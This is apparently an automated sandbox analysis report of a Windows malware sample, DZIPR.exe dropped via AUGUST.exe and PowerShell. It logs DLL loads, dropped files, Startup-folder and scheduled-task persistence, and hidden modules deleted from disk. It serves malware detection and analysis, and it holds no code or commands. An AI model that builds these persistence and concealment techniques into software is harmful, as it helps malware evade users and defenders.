Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winmm.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: wlxpec.17.dr	LNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
Source: BIT3E06.tmp.19.dr	LNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 0000000E.00000003.2720616296.000000000267B000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.15.dr, DZIPR.dll.14.dr

Source: C:\Users\user\AppData\Roaming\AUGUST.exe

Code function: 14_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

14_2_00406D5D

Source: vqqcre.21.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: mdvbfllr.17.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: DZIPR.dll.14.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: DZIPR.dll.15.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: yigmovm.25.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: AUGUST.exe.11.dr	Static PE information: real checksum: 0x33302 should be: 0x4a3c93

Source: DZIPR.exe.14.dr	Static PE information: section name: .didata
Source: DZIPR.exe.15.dr	Static PE information: section name: .didata
Source: mdvbfllr.17.dr	Static PE information: section name: cmxvoc
Source: vqqcre.21.dr	Static PE information: section name: cmxvoc
Source: yigmovm.25.dr	Static PE information: section name: cmxvoc

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_00411C20 push eax; ret	14_2_00411C4E
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA75401 push ecx; ret	15_2_6FA75414
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA751A1 push ecx; ret	15_2_6FA751B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C545401 push ecx; ret	16_2_6C545414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C5451A1 push ecx; ret	16_2_6C5451B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD15401 push ecx; ret	20_2_6FD15414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD151A1 push ecx; ret	20_2_6FD151B4

Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\AUGUST.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\yigmovm	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	File created: C:\Users\user\DZIPR.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\mdvbfllr	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	File created: C:\Users\user\DZIPR.exe	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\vqqcre	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\mdvbfllr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\vqqcre	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\yigmovm	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT3E06.tmp

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\MDVBFLLR
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VQQCRE
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YIGMOVM

Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA6DE29 IsIconic,GetWindowPlacement,GetWindowRect,	15_2_6FA6DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C53DE29 IsIconic,GetWindowPlacement,GetWindowRect,	16_2_6C53DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD0DE29 IsIconic,GetWindowPlacement,GetWindowRect,	20_2_6FD0DE29

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
